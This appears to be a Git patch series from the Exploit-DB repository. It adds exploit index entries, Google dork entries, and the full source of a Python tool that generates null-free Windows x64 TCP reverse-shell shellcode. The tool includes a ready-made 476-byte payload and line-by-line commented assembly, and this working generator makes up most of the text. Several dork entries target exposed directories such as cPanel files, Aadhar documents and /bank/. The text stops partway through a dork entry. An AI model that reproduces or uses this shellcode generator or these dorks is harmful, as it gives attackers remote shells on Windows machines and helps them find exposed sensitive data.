 7702,exploits/windows/local/7702.c,"GOM Player 2.0.12.3375 - '.asx' Local Stack Overflow",2009-01-08,DATA_SNIPER,local,windows,,2009-01-07,,1,,,,,http://www.exploit-db.comGOMPLAYERENSETUP_v2.0.12.EXE,http://secunia.com/advisories/23994
 18174,exploits/windows/local/18174.py,"GOM Player 2.1.33.5071 - '.asx' File Unicode Stack Buffer Overflow",2011-11-30,"Debasish Mandal",local,windows,,2011-11-30,2011-11-30,1,CVE-2011-5162;OSVDB-33080;CVE-2007-0707,,,http://www.exploit-db.com/screenshots/idlt18500/18174.png,,
 30154,exploits/windows/local/30154.pl,"GOM Player 2.2.53.5169 - '.reg' Local Buffer Overflow (SEH)",2013-12-09,"Mike Czumak",local,windows,,2013-12-10,2013-12-10,1,CVE-2013-6356,,,http://www.exploit-db.com/screenshots/idlt30500/screen-shot-2013-12-10-at-64257-pm.png,,
+51724,exploits/windows/local/51724.py,"GOM Player 2.3.90.5360 - Buffer Overflow (PoC)",2023-09-08,"Ahmet Ümit BAYRAM",local,windows,,2023-09-08,2023-09-08,0,,,,,,
 14790,exploits/windows/local/14790.c,"Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,local,windows,,2010-08-25,2010-08-26,1,CVE-2010-3134;OSVDB-67539,,,,,
 11152,exploits/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,local,windows,,2010-01-15,,1,,,,,http://www.exploit-db.comGoogleSketchUpWEN.exe,http://www.coresecurity.com/content/google-sketchup-vulnerability
 963,exploits/windows/local/963.c,"GoText 1.01 - Local User Informations Disclosure",2005-04-28,Kozan,local,windows,,2005-04-27,,1,OSVDB-14686;CVE-2005-1424,,,,,
@@ -42945,6 +42955,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 969,exploits/windows/remote/969.c,"Golden FTP Server Pro 2.52 - Remote Buffer Overflow (3)",2005-04-29,darkeagle,remote,windows,21,2005-04-28,2011-04-28,1,OSVDB-14369;CVE-2005-0634,,,,http://www.exploit-db.comGolden_FTP_Server_Pro_v2.50.zip,
 16572,exploits/windows/remote/16572.rb,"GOM Player - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-5779;OSVDB-38282,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/27418/
 4579,exploits/windows/remote/4579.html,"GOM Player 2.1.6.3499 - 'GomWeb3.dll 1.0.0.12' Remote Overflow",2007-10-29,rgod,remote,windows,,2007-10-28,2016-10-20,1,OSVDB-38282;CVE-2007-5779,,,,http://www.exploit-db.comgom2163499.exe,
+51719,exploits/windows/remote/51719.py,"GOM Player 2.3.90.5360 - Remote Code Execution (RCE)",2023-09-08,"M. Akil Gündoğan",remote,windows,,2023-09-08,2023-09-08,0,,,,,,
 6804,exploits/windows/remote/6804.pl,"GoodTech SSH - 'SSH_FXP_OPEN' Remote Buffer Overflow",2008-10-22,r0ut3r,remote,windows,22,2008-10-21,,1,OSVDB-49249;CVE-2008-4726,,,,,
 16817,exploits/windows/remote/16817.rb,"GoodTech Telnet Server 5.0.6 - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,2380,2010-05-09,2011-03-07,1,CVE-2005-0768;OSVDB-14806,"Metasploit Framework (MSF)",,,,
 883,exploits/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,remote,windows,2380,2005-04-23,,1,,,,,,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 8882077c19..92132dd6a2 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -933,6 +933,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 15136,shellcodes/windows/15136.cpp,"Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode",2010-09-27,"Celil Ünüver",,windows,,2010-09-27,2010-11-06,1,,,,,,
 51390,shellcodes/windows/51390.asm,"Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode",2023-04-25,Nayani,,windows,,2023-04-25,2023-04-25,0,,,,,,
 51634,shellcodes/windows/51634.py,"Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)",2023-07-28,Senzee,,windows,169,2023-07-28,2023-07-28,0,,,,,,
+51721,shellcodes/windows/51721.py,"Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)",2023-09-08,Senzee,,windows,476,2023-09-08,2023-09-08,0,,,,,,
 13525,shellcodes/windows_x86/13525.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes)",2005-07-26,loco,,windows_x86,29,2005-07-25,,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-388.php
 13526,shellcodes/windows_x86/13526.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,,windows_x86,31,2005-01-25,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-387.php
 13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes)",2005-01-09,oc192,,windows_x86,35,2005-01-08,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-260.php
diff --git a/ghdb.xml b/ghdb.xml
index ce745b3cd5..1b3d476dca 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -37668,6 +37668,21 @@ stag_1</textualDescription>
   <date>2021-11-05</date>
   <author>Veeresh Appasaheb Patil</author>
  </entry>
+ <entry>
+  <id>8223</id>
+  <link>https://www.exploit-db.com/ghdb/8223</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>index of cpanel.txt</shortDescription>
+  <textualDescription># Google Dork: index of cpanel.txt
+# Files Containing Juicy Info
+# Date: 08/09/2023
+# Author: Ved Kolambkar</textualDescription>
+  <query>new google dork</query>
+  <querystring>https://www.google.com/search?q=new google dork</querystring>
+  <edb></edb>
+  <date>2023-09-08</date>
+  <author>Ved Kolambkar</author>
+ </entry>
  <entry>
   <id>7025</id>
   <link>https://www.exploit-db.com/ghdb/7025</link>
@@ -49339,6 +49354,21 @@ Maxime Westhoven
   <date>2019-10-18</date>
   <author>Maxime Westhoven</author>
  </entry>
+ <entry>
+  <id>8222</id>
+  <link>https://www.exploit-db.com/ghdb/8222</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>inurl:&quot;/admin&quot; intitle:&quot;portfolio&quot;.</shortDescription>
+  <textualDescription># Google Dork: inurl:&quot;/admin&quot; intitle:&quot;portfolio&quot;.
+# Files Containing Juicy Info
+# Date: 08/09/2023
+# Exploit Jannatul Adnin</textualDescription>
+  <query>My name is Jannatul Adnin and I would like to report a new Google dork.</query>
+  <querystring>https://www.google.com/search?q=My name is Jannatul Adnin and I would like to report a new Google dork.</querystring>
+  <edb></edb>
+  <date>2023-09-08</date>
+  <author>Jannatul Adnin</author>
+ </entry>
  <entry>
   <id>8118</id>
   <link>https://www.exploit-db.com/ghdb/8118</link>
diff --git a/shellcodes/windows/51721.py b/shellcodes/windows/51721.py
new file mode 100755
index 0000000000..2609acff14
--- /dev/null
+++ b/shellcodes/windows/51721.py
@@ -0,0 +1,377 @@
+import ctypes, struct
+import argparse
+from keystone import *
+
+# Exploit Title: Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode (476 Bytes)
+# Exploit Author: Senzee
+# Date: 08/29/2023
+# Platform: Windows X64
+# Tested on: Windows 11 Home/Windows Server 2022 Standard/Windows Server 2019 Datacenter
+# OS Version (respectively): 10.0.22621 /10.0.20348 /10.0.17763
+# Test IP: 192.168.1.45
+# Test Port: 443
+# Payload size: 476 bytes
+# NUll-Free: True
+# Detailed information can be found at https://github.com/senzee1984/micr0_shell
+
+
+
+# Generated Shellcode (192.168.1.45:443):
+# Payload size: 476 bytes
+# buf =  b"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d"
+# buf += b"\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01"
+# buf += b"\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01"
+# buf += b"\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31"
+# buf += b"\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45"
+# buf += b"\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b"
+# buf += b"\x04\x8b\x4c\x01\xc8\xc3\xc3\x4c\x89\xcd\x41\xb8\x8e\x4e\x0e\xec\xe8\x8f\xff\xff"
+# buf += b"\xff\x49\x89\xc4\x48\x31\xc0\x66\xb8\x6c\x6c\x50\x48\xb8\x57\x53\x32\x5f\x33\x32"
+# buf += b"\x2e\x64\x50\x48\x89\xe1\x48\x83\xec\x20\x4c\x89\xe0\xff\xd0\x48\x83\xc4\x20\x49"
+# buf += b"\x89\xc6\x49\x89\xc1\x41\xb8\xcb\xed\xfc\x3b\x4c\x89\xcb\xe8\x55\xff\xff\xff\x48"
+# buf += b"\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x8d\x14\x24\x66\xb9\x02\x02\x48\x83\xec"
+# buf += b"\x30\xff\xd0\x48\x83\xc4\x30\x49\x89\xd9\x41\xb8\xd9\x09\xf5\xad\xe8\x2b\xff\xff"
+# buf += b"\xff\x48\x83\xec\x30\x48\x31\xc9\xb1\x02\x48\x31\xd2\xb2\x01\x4d\x31\xc0\x41\xb0"
+# buf += b"\x06\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x4c\x89\x4c\x24\x28\xff\xd0\x49\x89\xc4\x48"
+# buf += b"\x83\xc4\x30\x49\x89\xd9\x41\xb8\x0c\xba\x2d\xb3\xe8\xf3\xfe\xff\xff\x48\x83\xec"
+# buf += b"\x20\x4c\x89\xe1\x48\x31\xd2\xb2\x02\x48\x89\x14\x24\x48\x31\xd2\x66\xba\x01\xbb"
+# buf += b"\x48\x89\x54\x24\x02\xba\xc0\xa8\x01\x2d\x48\x89\x54\x24\x04\x48\x8d\x14\x24\x4d"
+# buf += b"\x31\xc0\x41\xb0\x16\x4d\x31\xc9\x48\x83\xec\x38\x4c\x89\x4c\x24\x20\x4c\x89\x4c"
+# buf += b"\x24\x28\x4c\x89\x4c\x24\x30\xff\xd0\x48\x83\xc4\x38\x49\x89\xe9\x41\xb8\x72\xfe"
+# buf += b"\xb3\x16\xe8\x99\xfe\xff\xff\x48\xba\x9c\x92\x9b\xd1\x9a\x87\x9a\xff\x48\xf7\xd2"
+# buf += b"\x52\x48\x89\xe2\x41\x54\x41\x54\x41\x54\x48\x31\xc9\x66\x51\x51\x51\xb1\xff\x66"
+# buf += b"\xff\xc1\x66\x51\x48\x31\xc9\x66\x51\x66\x51\x51\x51\x51\x51\x51\x51\xb1\x68\x51"
+# buf += b"\x48\x89\xe7\x48\x89\xe1\x48\x83\xe9\x20\x51\x57\x48\x31\xc9\x51\x51\x51\x48\xff"
+# buf += b"\xc1\x51\xfe\xc9\x51\x51\x51\x51\x49\x89\xc8\x49\x89\xc9\xff\xd0"
+
+
+def print_banner():
+	banner="""
+███╗░░░███╗██╗░█████╗░██████╗░░█████╗░  ░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
+████╗░████║██║██╔══██╗██╔══██╗██╔══██╗  ██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
+██╔████╔██║██║██║░░╚═╝██████╔╝██║░░██║  ╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
+██║╚██╔╝██║██║██║░░██╗██╔══██╗██║░░██║  ░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
+██║░╚═╝░██║██║╚█████╔╝██║░░██║╚█████╔╝  ██████╔╝██║░░██║███████╗███████╗███████╗
+╚═╝░░░░░╚═╝╚═╝░╚════╝░╚═╝░░╚═╝░╚════╝░  ╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝
+"""
+	print(banner)
+	print("Author: Senzee")
+	print("Original Github Repository: https://github.com/senzee1984/micr0_shell")
+	print("Description: Dynamically generate PIC Null-Free Windows X64 TCP Reverse Shell Shellcode")
+	print("This version does not support shellcode execution")
+	print("Attention: In rare cases (.255 and .0 co-exist), generated shellcode could contain NULL bytes, E.G. when IP is 192.168.0.255\n\n")
+
+
+def get_port_argument(port):
+	port_hex_str = format(port, '04x')
+	port_part_1, port_part_2 = port_hex_str[2:], port_hex_str[:2]
+	if "00" in {port_part_1, port_part_2}:
+		port += 257
+		port_hex_str = format(port, '04x')
+		port_part_1, port_part_2 = port_hex_str[2:], port_hex_str[:2]
+		return f"mov dx, 0x{port_part_1 + port_part_2};\nsub dx, 0x101;"
+	return f"mov dx, 0x{port_part_1 + port_part_2};"
+
+
+def get_ip_argument(ip):
+	ip_hex_parts = [format(int(part), '02x') for part in ip.split('.')]
+	reversed_hex = ''.join(ip_hex_parts[::-1])
+	if "00" in ip_hex_parts and "ff" not in ip_hex_parts:
+		hex_int = int(reversed_hex, 16)
+		neg_hex = (0xFFFFFFFF + 1 - hex_int) & 0xFFFFFFFF
+		return f"mov edx, 0x{neg_hex:08x};\nneg rdx;"
+	return f"mov edx, 0x{reversed_hex};"
+
+
+def get_shell_type_argument(shell_type):
+	if shell_type == "cmd":
+		return f"mov rdx, 0xff9a879ad19b929c;\nnot rdx;"
+	return (f"sub rsp, 8;\nmov rdx, 0xffff9a879ad19393;\nnot rdx;\npush rdx;"
+            f"\nmov rdx, 0x6568737265776f70;")
+
+
+def output_shellcode(lan,encoding,var,save):
+	sh = b""
+	for e in encoding:
+    		sh += struct.pack("B", e)
+	shellcode = bytearray(sh)
+	print("[+]Payload size: "+str(len(encoding))+" bytes\n")
+	counter=0
+
+	if lan=="python":
+		print("[+]Shellcode format for Python\n")
+		sc = ""
+		sc = var+" = b\""
+		for dec in encoding:
+    			if counter % 20 == 0 and counter != 0:
+        			sc += "\"\n"+var+"+="+"b\""
+    			sc += "\\x{0:02x}".format(int(dec))
+    			counter += 1
+
+		if count % 20 > 0:
+			sc += "\""
+		print(sc)
+
+	elif lan=="c":
+		print("[+]Shellcode format for C\n")
+		sc = "unsigned char " + var + "[]={\n"
+		for dec in encoding:
+    			if counter % 20 == 0 and counter != 0:
+        			sc += "\n"
+    			sc += "0x{0:02x}".format(int(dec))+","
+    			counter += 1
+		sc=sc[0:len(sc)-1]+"};"
+		print(sc)
+
+
+	elif lan=="powershell":
+		print("[+]Shellcode format for Powershell\n")
+		sc = "[Byte[]] $"+var+" = "
+		for dec in encoding:
+    			sc += "0x{0:02x}".format(int(dec))+","
+		sc=sc[0:len(sc)-1]
+		print(sc)
+
+	elif lan=="csharp":
+		print("[+]Shellcode format for C#\n")
+		sc = "byte[] " + var + "= new byte["+str(len(encoding))+"] {\n"
+		for dec in encoding:
+    			if counter % 20 == 0 and counter != 0:
+        			sc += "\n"
+    			sc += "0x{0:02x}".format(int(dec))+","
+    			counter += 1
+		sc=sc[0:len(sc)-1]+"};"
+		print(sc)
+
+	else:
+		print("Unsupported language! Exiting...")
+		exit()
+
+
+	if save=="true":
+		try:
+			with open(output, 'wb') as f:
+				f.write(shellcode)
+				print("\n\nGenerated shellcode successfully saved in file "+output)
+		except Exception as e:
+			print(e)
+
+
+if __name__ == "__main__":
+	print_banner()
+	parser = argparse.ArgumentParser(description='Dynamically generate Windows x64 reverse shell.')
+	parser.add_argument('--ip', '-i', required=True, dest='ip',help='The listening IP address, default value is 192.168.0.45')
+	parser.add_argument('--port', '-p', required=False, default=443, dest='port',help='The local listening port, default value is 443')
+	parser.add_argument('--language', '-l', required=False, default='python', dest='lan',help='The language of desired shellcode runner, default language is python. Support c, csharp, python, powershell')
+	parser.add_argument('--variable', '-v', required=False, default='buf', dest='var',help='The variable name of shellcode array, default variable is buf')
+	parser.add_argument('--type', '-t', required=False, default='cmd', dest='shell_type',help='The shell type, Powershell or Cmd, default shell is cmd')
+	parser.add_argument('--save', '-s', required=False, default='False', dest='save',help='Whether to save the generated shellcode to a bin file, True/False')
+	parser.add_argument('--output', '-o', required=False, default='', dest='output',help='If choose to save the shellcode to file, the desired location.')
+
+	args = parser.parse_args()
+	ip=args.ip
+	port=int(args.port)
+	lan=args.lan.lower()
+	var=args.var
+	shell_type=args.shell_type.lower()
+	save=args.save.lower()
+	output=args.output
+	print("[+]Shellcode Settings:")
+	print("******** IP Address: "+ip)
+	print("******** Listening Port: "+str(port))
+	print("******** Language of desired shellcode runner: "+lan)
+	print("******** Shellcode array variable name: "+var)
+	print("******** Shell: "+shell_type)
+	print("******** Save Shellcode to file: "+save+"\n\n")
+
+	args = parser.parse_args()
+	port_argument = get_port_argument(port)
+	ip_argument = get_ip_argument(ip)
+	shell_type = get_shell_type_argument(shell_type)
+
+	CODE = (
+"find_kernel32:"
+" xor rdx, rdx;"
+" mov rax, gs:[rdx+0x60];"        # RAX stores the value of ProcessEnvironmentBlock member in TEB, which is the PEB address
+" mov rsi,[rax+0x18];"        # Get the value of the LDR member in PEB, which is the address of the _PEB_LDR_DATA structure
+" mov rsi,[rsi + 0x30];"        # RSI is the address of the InInitializationOrderModuleList member in the _PEB_LDR_DATA structure
+" mov r9, [rsi];"        # Current module is python.exe
+" mov r9, [r9];"        # Current module is ntdll.dll
+" mov r9, [r9+0x10];"        # Current module is kernel32.dll
+" jmp jump_section;"
+
+"parse_module:"        # Parsing DLL file in memory
+" mov ecx, dword ptr [r9 + 0x3c];"        # R9 stores the base address of the module, get the NT header offset
+" xor r15, r15;"
+" mov r15b, 0x88;"	# Offset to Export Directory
+" add r15, r9;"
+" add r15, rcx;"
+" mov r15d, dword ptr [r15];"        # Get the RVA of the export directory
+" add r15, r9;"        # R14 stores  the VMA of the export directory
+" mov ecx, dword ptr [r15 + 0x18];"        # ECX stores the number of function names as an index value
+" mov r14d, dword ptr [r15 + 0x20];"        # Get the RVA of ENPT
+" add r14, r9;"        # R14 stores  the VMA of ENPT
+
+"search_function:"        # Search for a given function
+" jrcxz not_found;"        # If RCX is 0, the given function is not found
+" dec ecx;"        # Decrease index by 1
+" xor rsi, rsi;"
+" mov esi, [r14 + rcx*4];"        # RVA of function name string
+" add rsi, r9;"        # RSI points to function name string
+
+"function_hashing:"        # Hash function name function
+" xor rax, rax;"
+" xor rdx, rdx;"
+" cld;"        # Clear DF flag
+
+"iteration:"        # Iterate over each byte
+" lodsb;"        # Copy the next byte of RSI to Al
+" test al, al;"        # If reaching the end of the string
+" jz compare_hash;"        # Compare hash
+" ror edx, 0x0d;"        # Part of hash algorithm
+" add edx, eax;"        # Part of hash algorithm
+" jmp iteration;"        # Next byte
+
+"compare_hash:"        # Compare hash
+" cmp edx, r8d;"
+" jnz search_function;"        # If not equal, search the previous function (index decreases)
+" mov r10d, [r15 + 0x24];"        # Ordinal table RVA
+" add r10, r9;"        # Ordinal table VMA
+" movzx ecx, word ptr [r10 + 2*rcx];"        # Ordinal value -1
+" mov r11d, [r15 + 0x1c];"        # RVA of EAT
+" add r11, r9;"        # VMA of EAT
+" mov eax, [r11 + 4*rcx];"        # RAX stores RVA of the function
+" add rax, r9;"        # RAX stores  VMA of the function
+" ret;"
+"not_found:"
+" ret;"
+
+"jump_section:"        # Achieve PIC and elminiate 0x00 byte
+" mov rbp, r9;"        # RBP stores base address of Kernel32.dll
+" mov r8d, 0xec0e4e8e;"        # LoadLibraryA Hash
+" call parse_module;"        # Search LoadLibraryA's address
+" mov r12, rax;"        # R12 stores the address of LoadLibraryA function
+
+"load_module:"
+" xor rax, rax;"
+" mov ax, 0x6c6c;"        # Save the string "ll" to RAX
+" push rax;"        # Push the string to the stack
+" mov rax, 0x642E32335F325357;"        # Save the string "WS2_32.D" to RAX
+" push rax;"        # Push the string to the stack
+" mov rcx, rsp;"        # RCX points to the "WS2_32.dll" string
+" sub rsp, 0x20;"        # Function prologue
+" mov rax, r12;"        # RAX stores address of LoadLibraryA function
+" call rax;"        # LoadLibraryA("ws2_32.dll")
+" add rsp, 0x20;"        # Function epilogue
+" mov r14, rax;"        # R14 stores the base address of ws2_32.dll
+
+"call_wsastartup:"
+" mov r9, rax;"        # R9 stores the base address of ws2_32.dll
+" mov r8d, 0x3bfcedcb;"        # Hash of WSAStartup
+" mov rbx, r9;"        # Save the base address of ws2_32.dll to RBX for later use
+" call parse_module;"        # Search for and get the address of WSAStartup
+" xor rcx, rcx;"
+" mov cx, 0x198;"
+" sub rsp, rcx;"        # Reserve enough space for the lpWSDATA structure
+" lea rdx, [rsp];"        # Assign the address of lpWSAData to the RDX register as the 2nd parameter
+" mov cx, 0x202;"        # Assign 0x202 to wVersionRequired and store it in RCX as the 1st parameter
+" sub rsp, 0x30;"        # Function prologue
+" call rax;"        # Call WSAStartup
+" add rsp, 0x30;"        # Function epilogue
+
+"call_wsasocket:"
+" mov r9, rbx;"
+" mov r8d, 0xadf509d9;"        # Hash of WSASocketA function
+" call parse_module;"        # Get the address of WSASocketA function
+" sub rsp, 0x30;"        # Function prologue
+" xor rcx, rcx;"
+" mov cl, 2;"        # AF is 2 as the 1st parameter
+" xor rdx, rdx;"
+" mov dl, 1;"        # Type is 1 as the 2nd parameter
+" xor r8, r8;"
+" mov r8b, 6;"        # Protocol is 6 as the 3rd parameter
+" xor r9, r9;"        # lpProtocolInfo is 0 as the 4th parameter
+" mov [rsp+0x20], r9;"        # g is 0 as the 5th parameter, stored on the stack
+" mov [rsp+0x28], r9;"        # dwFlags is 0 as the 6th parameter, stored on the stack
+" call rax;"        # Call WSASocketA function
+" mov r12, rax;"        # Save the returned socket type return value in R12 to prevent data loss in RAX
+" add rsp, 0x30;"        # Function epilogue
+
+"call_wsaconnect:"
+" mov r9, rbx;"
+" mov r8d, 0xb32dba0c;"        # Hash of WSAConnect
+" call parse_module;"        # Get the address of WSAConnect
+" sub rsp, 0x20;"        # Allocate enough space for the socketaddr structure
+" mov rcx, r12;"        # Pass the socket descriptor returned by WSASocketA to RCX as the 1st parameter
+" xor rdx, rdx;"
+" mov dl, 2;"        # Set sin_family to AF_INET (=2)
+" mov [rsp], rdx;"        # Store the socketaddr structure
+" xor rdx, rdx;"
+f"{port_argument}"	# Set local port dynamically
+" mov [rsp+2], rdx;"        # Pass the port value to the corresponding position in the socketaddr structure
+f"{ip_argument}"
+" mov [rsp+4], rdx;"        # Pass IP to the corresponding position in the socketaddr structure
+# " xor r8, r8;"
+# " mov [rsp+8], r8;"        # Set zero for sin_zero. Comment these 2 lines to save more bytes, does not prevent the shellcode from working
+" lea rdx, [rsp];"        # Pointer to the socketaddr structure as the 2nd parameter
+" xor r8, r8;"
+" mov r8b, 0x16;"        # Set namelen member to 0x16
+" xor r9, r9;"        # lpCallerData is 0 as the 4th parameter
+" sub rsp, 0x38;"        # Function prologue
+" mov [rsp+0x20], r9;"        # lpCalleeData is 0 as the 5th parameter
+" mov [rsp+0x28], r9;"        # lpSQOS is 0 as the 6th parameter
+" mov [rsp+0x30], r9;"        # lpGQOS is 0 as the 7th parameter
+" call rax;"        # Call WSAConnect
+" add rsp, 0x38;"        # Function epilogue
+
+"call_createprocess:"
+" mov r9, rbp;"        # R9 stores the base address of Kernel32.dll
+" mov r8d, 0x16b3fe72;"        # Hash of CreateProcessA
+" call parse_module;"        # Get the address of CreateProcessA
+f"{shell_type}"
+" push rdx;"
+" mov rdx, rsp;"        # Pointer to "cmd.exe" is stored in the RCX register
+" push r12;"        # The member STDERROR is the return value of WSASocketA
+" push r12;"        # The member STDOUTPUT is the return value of WSASocketA
+" push r12;"        # The member STDINPUT is the return value of WSASocketA
+" xor rcx, rcx;"
+" push cx;"        # Pad with 0x00 before pushing the dwFlags member, only the total size matters
+" push rcx;"
+" push rcx;"
+" mov cl, 0xff;"
+" inc cx;"        # 0xff+1=0x100
+" push cx;"        # dwFlags=0x100
+" xor rcx, rcx;"
+" push cx;"        # Pad with 0 before pushing the cb member, only the total size matters
+" push cx;"
+" push rcx;"
+" push rcx;"
+" push rcx;"
+" push rcx;"
+" push rcx;"
+" push rcx;"
+" mov cl, 0x68;"
+" push rcx;"        # cb=0x68
+" mov rdi, rsp;"        # Pointer to STARTINFOA structure
+" mov rcx, rsp;"
+" sub rcx, 0x20;"        # Reserve enough space for the ProcessInformation structure
+" push rcx;"        # Address of the ProcessInformation structure as the 10th parameter
+" push rdi;"        # Address of the STARTINFOA structure as the 9th parameter
+" xor rcx, rcx;"
+" push rcx;"        # Value of lpCurrentDirectory is 0 as the 8th parameter
+" push rcx;"        # lpEnvironment=0 as the 7th argument
+" push rcx;"        # dwCreationFlags=0 as the 6th argument
+" inc rcx;"
+" push rcx;"        # Value of bInheritHandles is 1 as the 5th parameter
+" dec cl;"
+" push rcx;"        # Reserve space for the function return area (4th parameter)
+" push rcx;"        # Reserve space for the function return area (3rd parameter)
+" push rcx;"        # Reserve space for the function return area (2nd parameter)
+" push rcx;"        # Reserve space for the function return area (1st parameter)
+" mov r8, rcx;"        # lpProcessAttributes value is 0 as the 3rd parameter
+" mov r9, rcx;"        # lpThreatAttributes value is 0 as the 4th parameter
+" call rax;"        # Call CreateProcessA
+)
+
+	ks = Ks(KS_ARCH_X86, KS_MODE_64)
+	encoding, count = ks.asm(CODE)
+	output_shellcode(lan,encoding,var,save)
\ No newline at end of file

From db6fc602bf1e2c532f850f103b5966aa4662c69a Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Tue, 12 Sep 2023 00:16:26 +0000
Subject: [PATCH 16/17] DB: 2023-09-12

1 changes to exploits/shellcodes/ghdb
---
 ghdb.xml | 231 +++++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 231 insertions(+)

diff --git a/ghdb.xml b/ghdb.xml
index 1b3d476dca..dc3eb6dc69 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -33676,6 +33676,21 @@ Aamir Rehman
   <date>2018-02-14</date>
   <author>Aamir Rehman</author>
  </entry>
+ <entry>
+  <id>8233</id>
+  <link>https://www.exploit-db.com/ghdb/8233</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>allintitle:&quot;macOS Server&quot; site:.com</shortDescription>
+  <textualDescription># Google Dork: allintitle:&quot;macOS Server&quot; site:.com
+# Files Containing Juicy Info
+# Date: 11/09/2023
+# Exploit Kamlesh Pendurkar</textualDescription>
+  <query>For Google dork</query>
+  <querystring>https://www.google.com/search?q=For Google dork</querystring>
+  <edb></edb>
+  <date>2023-09-11</date>
+  <author>Kamlesh Pendurkar</author>
+ </entry>
  <entry>
   <id>8200</id>
   <link>https://www.exploit-db.com/ghdb/8200</link>
@@ -37941,6 +37956,21 @@ stag_1</textualDescription>
   <date>2021-11-05</date>
   <author>Veeresh Appasaheb Patil</author>
  </entry>
+ <entry>
+  <id>8234</id>
+  <link>https://www.exploit-db.com/ghdb/8234</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>index of: /aadhar</shortDescription>
+  <textualDescription># Google Dork: index of: /aadhar
+# Files Containing Juicy Info
+# Date: 11/09/2023
+# Exploit sai vijay kumar M</textualDescription>
+  <query>index of: /aadhar</query>
+  <querystring>https://www.google.com/search?q=index of: /aadhar</querystring>
+  <edb></edb>
+  <date>2023-09-11</date>
+  <author>sai vijay kumar M</author>
+ </entry>
  <entry>
   <id>7985</id>
   <link>https://www.exploit-db.com/ghdb/7985</link>
@@ -41060,6 +41090,36 @@ Sagar Banwa
   <date>2022-06-28</date>
   <author>Sandesh Ajgekar</author>
  </entry>
+ <entry>
+  <id>8224</id>
+  <link>https://www.exploit-db.com/ghdb/8224</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intitle:&quot;Index of /api/&quot;</shortDescription>
+  <textualDescription># Google Dork: intitle:&quot;Index of /api/&quot;
+# Files Containing Juicy Info
+# Date: 11/09/2023
+# Exploit Kamran Saifullah</textualDescription>
+  <query>intitle:&quot;Index of /api/&quot;</query>
+  <querystring>https://www.google.com/search?q=intitle:&quot;Index of /api/&quot;</querystring>
+  <edb></edb>
+  <date>2023-09-11</date>
+  <author>Kamran Saifullah</author>
+ </entry>
+ <entry>
+  <id>8225</id>
+  <link>https://www.exploit-db.com/ghdb/8225</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intitle:&quot;Index of /bank/&quot;</shortDescription>
+  <textualDescription>Google Dork: intitle:&quot;Index of /bank/&quot;
+# Files Containing Juicy Info
+# Date: 11/09/2023
+# Exploit Kamran Saifullah</textualDescription>
+  <query>intitle:&quot;Index of /bank/&quot;</query>
+  <querystring>https://www.google.com/search?q=intitle:&quot;Index of /bank/&quot;</querystring>
+  <edb></edb>
+  <date>2023-09-11</date>
+  <author>Kamran Saifullah</author>
+ </entry>
  <entry>
   <id>8086</id>
   <link>https://www.exploit-db.com/ghdb/8086</link>
@@ -41139,6 +41199,21 @@ https://twitter.com/Edmond_Major
   <date>2023-01-31</date>
   <author>Shuvrosayar Das</author>
  </entry>
+ <entry>
+  <id>8229</id>
+  <link>https://www.exploit-db.com/ghdb/8229</link>
+  <category>Files Containing Juicy Info</category>
+  <shortDescription>intitle:&quot;index of /wp-content/plugins&quot;</shortDescription>
+  <textualDescription>Google Dork: intitle:&quot;index of /wp-content/plugins&quot;
+# Files Containing Juicy Info
